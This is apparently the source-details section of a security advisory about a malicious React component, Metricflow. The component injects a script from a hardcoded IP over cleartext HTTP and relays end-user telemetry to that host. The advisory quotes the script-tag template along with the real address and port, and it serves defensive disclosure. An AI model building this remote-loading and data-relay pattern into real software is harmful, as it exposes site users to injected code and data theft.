---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a9a1c269ce5e462d7e555ce1ca34b7f2e54e3d34ea094d35a67aa7c61d1fe34e)

The package's exported Metricflow React component defaults serverUrl to http://51.38.65.105:21531 and, when rendered, appends a <script src="${serverUrl}/TrakLab-plugin/Dev/tracklab.js"> tag to document.head in the consumer's web application (dist/index.js line 18). The fetched JavaScript executes with full DOM and same-origin access in any site that uses the component. The source is a bare IPv4 address over cleartext HTTP at a mutable /Dev/ path with no Subresource Integrity, no version pinning, and no TLS — whoever controls that IP, and any on-path network attacker, can serve arbitrary JavaScript into the consumer's application. Additionally, window.MetricflowConfig.collectUrl defaults to http://51.38.65.105:21531/collect, silently relaying end-user telemetry collected by the loaded tracker to the same hardcoded host. Package metadata provides no author, homepage, or documentation tying that IP to a legitimate analytics vendor. The combination of remote-code-loading from an unverified mutable HTTP endpoint plus silent relay of end-user data to an opaque destination is supply-chain harm to any installer that renders this component.